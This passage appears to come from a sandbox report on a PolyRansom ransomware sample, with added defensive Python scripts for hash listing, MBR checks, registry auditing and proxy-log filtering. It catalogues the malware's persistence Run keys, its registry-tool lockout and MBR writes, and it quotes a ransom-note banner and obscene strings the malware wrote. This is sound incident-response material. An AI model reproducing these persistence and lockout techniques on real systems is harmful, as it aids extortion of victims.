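SHA256 9c42eca99e96a7402716fd865b57ea601fb9a18477fe2ab890bdbcd3052f68f8
SHA512 4d48d11f3d0a740b9193e17782c77b01f52dd6e8324755aa81188295a0caed0718d330453bb02ca8bc942ee5588928e57a0d89d90d6b1c32690338c5eae8e1ad

C:\Windows\9DB7.tmp

MD5 347ac3b6b791054de3e5720a7144a977
SHA1 413eba3973a15c1a6429d9f170f3e8287f98c21c
SHA256 301b905eb98d8d6bb559c04bbda26628a942b2c4107c07a02e8f753bdcfe347c
SHA512 9a399916bc681964af1e1061bc0a8e2926307642557539ad587ce6f9b5ef93bdf1820fe5d7b5ffe5f0bb38e5b4dc6add213ba04048c0c7c264646375fcd01787
"""


def parse_files(text: str) -> Dict[str, dict]:
    """Return {sha256: {"md5", "sha1", "sha512", "paths": [...]}} in first-seen order."""
    records: Dict[str, dict] = {}
    path = None                      # path line currently being described
    pending: Dict[str, str] = {}     # hashes collected for that path so far
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = HASH_RE.match(line)
        if m and path is not None:
            algo, digest = m.group(1), m.group(2).lower()
            if len(digest) != HASH_LENGTHS[algo]:
                raise ValueError(f"{algo} digest of wrong length for {path}")
            pending[algo] = digest
            # SHA512 is the last hash line of a record in this layout.
            if algo == "SHA512" and {"MD5", "SHA1", "SHA256"} <= pending.keys():
                rec = records.setdefault(pending["SHA256"], {
                    "md5": pending["MD5"], "sha1": pending["SHA1"],
                    "sha512": digest, "paths": [],
                })
                if path not in rec["paths"]:
                    rec["paths"].append(path)
                path, pending = None, {}
        elif line.startswith("memory/"):
            continue                 # process memory dumps carry no file hash
        else:
            path, pending = line, {}
    return records


def ioc_lines(records: Dict[str, dict]) -> List[str]:
    """One line per unique binary: sha256, md5, number of paths, first path."""
    return [f"{sha},{rec['md5']},{len(rec['paths'])},{rec['paths'][0]}"
            for sha, rec in records.items()]


if __name__ == "__main__":
    for line in ioc_lines(parse_files(REPORT_EXCERPT)):
        print(line)
```

Feed it the whole Files section (saved as text) and the output is a deduplicated hash list; a SHA256 appearing with paths under both ProgramData and Program Files is the same dropper copied twice, not two samples.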

Analysis: behavioral2

Detonation Overview

Submitted

2022-09-29 12:38

Reported

2022-09-29 12:40

Platform

win10v2004-20220812-en

Max time kernel

43s

Max time network

156s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe"

Signatures

Checks for common network interception software

evasion

Enumerates VirtualBox registry keys

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxGuest C:\Users\Admin\AppData\Local\Temp\[email protected] N/A

Disables RegEdit via registry modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" C:\Users\Admin\AppData\Local\Temp\[email protected] N/A

Disables Task Manager via registry modification

evasion

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A

Stops running service(s)

evasion

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\WINDOWS\\Web\\rundll32.exe" C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\AVPCC = "C:\\WINDOWS\\Cursors\\avp.exe" C:\Users\Admin\AppData\Local\Temp\[email protected] N/A

Checks installed software on the system

discovery

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\H: C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened (read-only) \??\K: C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened (read-only) \??\L: C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened (read-only) \??\M: C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened (read-only) \??\W: C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened (read-only) \??\F: C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened (read-only) \??\J: C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened (read-only) \??\N: C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened (read-only) \??\S: C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened (read-only) \??\V: C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened (read-only) \??\Y: C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened (read-only) \??\E: C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened (read-only) \??\P: C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened (read-only) \??\R: C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened (read-only) \??\T: C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened (read-only) \??\U: C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened (read-only) \??\G: C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened (read-only) \??\I: C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened (read-only) \??\O: C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened (read-only) \??\Q: C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened (read-only) \??\X: C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\[email protected] N/A

Legitimate hosting services abused for malware hosting/C2

Modifies WinLogon

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "DANGER" C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "Для того чтобы восстановить нормальную работу своего компьютера не потеряв ВСЮ информацию! И с экономив деньги, пришли мне на e-mail [email protected] код пополнения счета киевстар на 25 гривень. В ответ в течение двенадцати часов на свой e-mail ты получишь фаил для удаления этой программы." (English: "To restore normal operation of your computer without losing ALL your information, and to save money, send me by e-mail [email protected] a Kyivstar account top-up code for 25 hryvnia. In reply, within twelve hours you will receive at your e-mail a file to remove this program.") C:\Users\Admin\AppData\Local\Temp\[email protected] N/A

Writes to the Master Boot Record (MBR)

bootkit persistence
Description Indicator Process Target
File opened for modification \??\PhysicalDrive0 C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened for modification \??\PhysicalDrive0 C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
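
Two processes open \??\PhysicalDrive0 for modification, which is the raw disk and therefore the MBR; a bootkit overwrites the 446-byte bootstrap area at the start of sector 0 while leaving the partition table and 0x55AA signature intact so the disk still boots. The checker below is an added example, not part of the report or the sandbox: it parses a 512-byte sector, hashes the bootstrap code and compares it with a baseline hash that is assumed to come from a known-good image of the same build. The sample sectors are constructed (the bootstrap bytes are not real boot code).

```python
"""Offline sanity checks for a 512-byte MBR sector (added example, not from the report).

The baseline bootstrap hash is assumed to come from a known-good disk image of
the same machine or build; the sectors built here are constructed test data.
"""
import hashlib
import struct
from dataclasses import dataclass
from typing import List

SECTOR_SIZE = 512
BOOTSTRAP_SIZE = 446        # bytes 0..445: boot code, the region a bootkit replaces
PART_TABLE_OFFSET = 446     # four 16-byte partition entries follow the boot code
PART_ENTRY_SIZE = 16
BOOT_SIG_OFFSET = 510       # bytes 510..511 must be 0x55 0xAA


@dataclass
class Partition:
    index: int
    active: bool
    type_id: int
    lba_start: int
    sectors: int


def parse_mbr(sector: bytes) -> dict:
    """Split a raw sector into signature state, bootstrap hash and partition entries."""
    if len(sector) != SECTOR_SIZE:
        raise ValueError(f"expected {SECTOR_SIZE} bytes, got {len(sector)}")
    sig = struct.unpack_from("<H", sector, BOOT_SIG_OFFSET)[0]
    parts = []
    for i in range(4):
        off = PART_TABLE_OFFSET + i * PART_ENTRY_SIZE
        # status(1) CHS-start(3) type(1) CHS-end(3) LBA-start(4) sector-count(4)
        status, type_id, lba, count = struct.unpack_from("<B3xB3xII", sector, off)
        if type_id != 0:
            parts.append(Partition(i, status == 0x80, type_id, lba, count))
    return {
        "signature_ok": sig == 0xAA55,      # 0x55,0xAA on disk reads as 0xAA55 little-endian
        "bootstrap_sha256": hashlib.sha256(sector[:BOOTSTRAP_SIZE]).hexdigest(),
        "partitions": parts,
    }


def check_mbr(sector: bytes, baseline_bootstrap_sha256: str) -> List[str]:
    """Return findings; an empty list means the sector matches the baseline."""
    info = parse_mbr(sector)
    findings = []
    if not info["signature_ok"]:
        findings.append("boot signature 0x55AA missing")
    if info["bootstrap_sha256"] != baseline_bootstrap_sha256:
        findings.append("bootstrap code differs from baseline")
    if not any(p.active for p in info["partitions"]):
        findings.append("no active partition")
    return findings


def build_sample_mbr(bootstrap: bytes, with_signature: bool = True) -> bytes:
    """Constructed sector: given boot code plus one active NTFS partition at LBA 2048."""
    code = bootstrap.ljust(BOOTSTRAP_SIZE, b"\x00")[:BOOTSTRAP_SIZE]
    entry = struct.pack("<B3sB3sII", 0x80, b"\x00\x00\x00", 0x07, b"\x00\x00\x00", 2048, 204800)
    table = entry + b"\x00" * (PART_ENTRY_SIZE * 3)
    sig = b"\x55\xaa" if with_signature else b"\x00\x00"
    return code + table + sig


# Constructed stand-ins for a clean and an overwritten boot sector (not real boot code).
CLEAN_BOOTSTRAP = b"\xfa\x33\xc0\x8e\xd0\xbc\x00\x7c" + b"\x90" * 64
TAMPERED_BOOTSTRAP = b"\xeb\xfe" + b"\xcc" * 300


if __name__ == "__main__":
    clean = build_sample_mbr(CLEAN_BOOTSTRAP)
    baseline = parse_mbr(clean)["bootstrap_sha256"]
    for name, sector in (("clean", clean), ("tampered", build_sample_mbr(TAMPERED_BOOTSTRAP))):
        print(name, check_mbr(sector, baseline) or "OK")
```

On a live Windows host with administrative rights the sector comes from `open(r"\\.\PhysicalDrive0", "rb").read(512)`; on an image, from its first 512 bytes. Compare against a baseline captured before the incident, since a hash of the current sector alone proves nothing.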

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\AnVi\splash.mp3 C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File created C:\Program Files (x86)\AnVi\virus.mp3 C:\Users\Admin\AppData\Local\Temp\[email protected] N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\WINDOWS\Web C:\Users\Admin\AppData\Local\Temp\[email protected] N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\sc.exe N/A
N/A N/A C:\Windows\SysWOW64\sc.exe N/A
N/A N/A C:\Windows\SysWOW64\sc.exe N/A
N/A N/A C:\Windows\SysWOW64\sc.exe N/A

Enumerates physical storage devices

NSIS installer

installer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies Control Panel

evasion
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\Desktop\WallpaperOriginX = "210" C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\Desktop\WallpaperOriginY = "187" C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\Desktop\MenuShowDelay = "9999" C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\sTimeFormat = "ХУЙ" (Russian obscenity) C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\Desktop C:\Users\Admin\AppData\Local\Temp\[email protected] N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window title = ":::::::::::::::::: МОЙ ХУЙ ПРОТУХ А ПИЗДА ГНИЕТ ::::::::::::::::::" (Russian obscenity) C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Internet Explorer\Main C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Use FormSuggest = "Yes" C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\Main C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\Window title = ":::::::::::::::::: МОЙ ХУЙ ПРОТУХ А ПИЗДА ГНИЕТ ::::::::::::::::::" (Russian obscenity) C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Internet Explorer\Main C:\Users\Admin\AppData\Local\Temp\[email protected] N/A

Modifies Internet Explorer start page

stealer
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\Start Page = "http://poetry.rotten.com/lightning/" C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page = "http://poetry.rotten.com/lightning/" C:\Users\Admin\AppData\Local\Temp\[email protected] N/A

Modifies registry class

Description Indicator Process Target
Key deleted \REGISTRY\MACHINE\SOFTWARE\CLASSES\REGFILE\SHELL\OPEN\COMMAND C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
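
The registry changes above (DisableRegistryTools under the Policies\System key, Run values named "svchost" and "AVPCC" pointing at C:\WINDOWS\Web and C:\WINDOWS\Cursors, the Winlogon LegalNotice banner and the IE Start Page) are the ones worth checking on every other host in the environment. The script below is an added example, not the report's or the sandbox's code: it parses a .reg export (as produced by `reg export`, or a hive exported from a forensic image) and flags the same pattern with rules rather than exact strings, so it also catches a renamed dropper. REG_EXPORT is constructed from the indicators above plus one benign Run entry; the allow-lists and rule thresholds are assumptions for illustration.

```python
"""Audit a .reg export for the persistence and lockout values this sample writes.

Added example, not part of the report. REG_EXPORT is constructed from the
report's indicators plus one benign entry; SYSTEM_DIRS and SYSTEM_NAMES are
illustrative allow-lists, not an exhaustive reference.
"""
import re
from typing import Dict, List, Tuple

KEY_RE = re.compile(r"^\[(?P<key>[^\]]+)\]$")
VALUE_RE = re.compile(r'^"(?P<name>[^"]+)"=(?P<data>.+)$')

POLICY_LOCKS = {"DisableRegistryTools", "DisableTaskMgr"}
SYSTEM_DIRS = ("\\windows\\system32\\", "\\windows\\syswow64\\")
SYSTEM_NAMES = {"svchost", "rundll32", "explorer", "lsass", "csrss", "winlogon"}

REG_EXPORT = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run]
"svchost"="C:\\WINDOWS\\Web\\rundll32.exe"
"AVPCC"="C:\\WINDOWS\\Cursors\\avp.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SecurityHealth"="C:\\Windows\\System32\\SecurityHealthSystray.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegistryTools"=dword:00000001

[HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon]
"LegalNoticeCaption"="DANGER"

[HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main]
"Start Page"="http://poetry.rotten.com/lightning/"
'''


def parse_reg(text: str) -> Dict[Tuple[str, str], str]:
    """Map (key path, value name) -> data for REG_SZ ("...") and REG_DWORD (dword:) values."""
    values: Dict[Tuple[str, str], str] = {}
    key = None
    for raw in text.splitlines():
        line = raw.strip()
        m = KEY_RE.match(line)
        if m:
            key = m.group("key")
            continue
        m = VALUE_RE.match(line)
        if not (m and key):
            continue
        data = m.group("data")
        if data.startswith("dword:"):
            data = str(int(data[len("dword:"):], 16))
        elif len(data) >= 2 and data[0] == data[-1] == '"':
            # .reg files double backslashes and escape quotes inside string data
            data = data[1:-1].replace("\\\\", "\\").replace('\\"', '"')
        values[(key, m.group("name"))] = data
    return values


def audit(values: Dict[Tuple[str, str], str]) -> List[str]:
    """One finding per value matching the behaviour listed in the report."""
    findings: List[str] = []
    for (key, name), data in values.items():
        k, path = key.lower(), data.lower()
        if k.endswith("\\policies\\system") and name in POLICY_LOCKS and data == "1":
            findings.append(f"{name}=1: regedit/Task Manager lockout policy")
        elif "\\currentversion\\run" in k:
            exe = path.rsplit("\\", 1)[-1]
            exe = exe[:-4] if exe.endswith(".exe") else exe
            in_system_dir = any(d in path for d in SYSTEM_DIRS)
            if (name.lower() in SYSTEM_NAMES or exe in SYSTEM_NAMES) and not in_system_dir:
                findings.append(f"Run value {name!r} -> {data}: system-binary name outside System32")
            elif "\\windows\\" in path and not in_system_dir:
                findings.append(f"Run value {name!r} -> {data}: autostart from an odd Windows subfolder")
        elif k.endswith("\\winlogon") and name.startswith("LegalNotice") and data:
            findings.append(f"Winlogon {name} set to {data!r}: logon banner used as ransom note")
        elif k.endswith("\\internet explorer\\main") and name == "Start Page":
            findings.append(f"IE Start Page changed to {data}")
    return findings


if __name__ == "__main__":
    for finding in audit(parse_reg(REG_EXPORT)):
        print(finding)
```

The Run rule deliberately keys on where the target lives rather than on the exact names from this detonation: a value called "svchost" is suspicious because no legitimate autostart uses that name, and rundll32.exe is suspicious in C:\WINDOWS\Web because the real one lives in System32/SysWOW64. Remediation is the reverse of the table above: delete the two Run values, set DisableRegistryTools and DisableTaskMgr to 0 in both HKLM and the user hive, and clear LegalNoticeCaption/LegalNoticeText.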

Runs net.exe

Script User-Agent

Description Indicator Process Target
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A
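
"Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)" is the default User-Agent of the WinHttp.WinHttpRequest.5.1 COM object, which VBScript/JScript and other script hosts send unless the script sets its own; no browser produces it, so in proxy logs it isolates scripted downloads such as the PE fetch the report records. The parser below is an added example, not part of the report: it reads Combined Log Format lines (Apache/nginx style), which are constructed here, and groups every request carrying that User-Agent by client address.

```python
"""Find requests made with the default WinHttp.WinHttpRequest.5 User-Agent in proxy logs.

Added example, not part of the report. SAMPLE_LOG is constructed in Combined
Log Format; the addresses and paths are made up for illustration.
"""
import re
from collections import defaultdict
from typing import Dict, List

# Apache/nginx "combined" format: client ident user [time] "request" status bytes "referer" "ua"
COMBINED_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Substring of the WinHttpRequest default UA; a substring match also covers
# the minor-version variants of the same COM object.
SCRIPT_UA_MARKER = "WinHttp.WinHttpRequest"

SAMPLE_LOG = """\
10.0.0.7 - - [29/Sep/2022:12:38:41 +0000] "GET /update/check HTTP/1.1" 200 512 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
10.0.0.7 - - [29/Sep/2022:12:38:44 +0000] "GET /files/stage2.bin HTTP/1.1" 200 93184 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
10.0.0.9 - - [29/Sep/2022:12:39:02 +0000] "POST /api/login HTTP/1.1" 302 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/105.0"
10.0.0.7 - - [29/Sep/2022:12:39:10 +0000] "GET /files/stage3.exe HTTP/1.1" 200 421376 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
"""


def parse_combined(lines: str) -> List[Dict[str, str]]:
    """Parse Combined Log Format lines; lines that do not match are dropped."""
    records = []
    for line in lines.splitlines():
        m = COMBINED_RE.match(line)
        if m:
            records.append(m.groupdict())
    return records


def script_client_hits(records: List[Dict[str, str]]) -> Dict[str, List[str]]:
    """Group the request line of every scripted-UA hit by client address."""
    hits: Dict[str, List[str]] = defaultdict(list)
    for rec in records:
        if SCRIPT_UA_MARKER in rec["ua"]:
            hits[rec["client"]].append(rec["request"])
    return dict(hits)


if __name__ == "__main__":
    for client, requests in script_client_hits(parse_combined(SAMPLE_LOG)).items():
        print(client)
        for request in requests:
            print("   ", request)
```

Treat a hit as a lead, not a verdict: some legitimate administration scripts use the same object, so pivot on what was fetched (here, the PE download the report lists under "Downloads MZ/PE file") and on the source host.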

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\[email protected] N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\[email protected] N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3388 wrote to memory of 4788 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe
PID 3388 wrote to memory of 4788 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe
PID 4788 wrote to memory of 1508 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 4788 wrote to memory of 1508 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 4788 wrote to memory of 1508 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 4788 wrote to memory of 1460 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 4788 wrote to memory of 1460 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 4788 wrote to memory of 1460 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 4788 wrote to memory of 2800 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 4788 wrote to memory of 2800 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 4788 wrote to memory of 2800 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 4788 wrote to memory of 2916 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 4788 wrote to memory of 2916 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 4788 wrote to memory of 2916 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 4788 wrote to memory of 3292 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Windows\SysWOW64\sc.exe
PID 4788 wrote to memory of 3292 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Windows\SysWOW64\sc.exe
PID 4788 wrote to memory of 3292 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Windows\SysWOW64\sc.exe
PID 4788 wrote to memory of 8 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
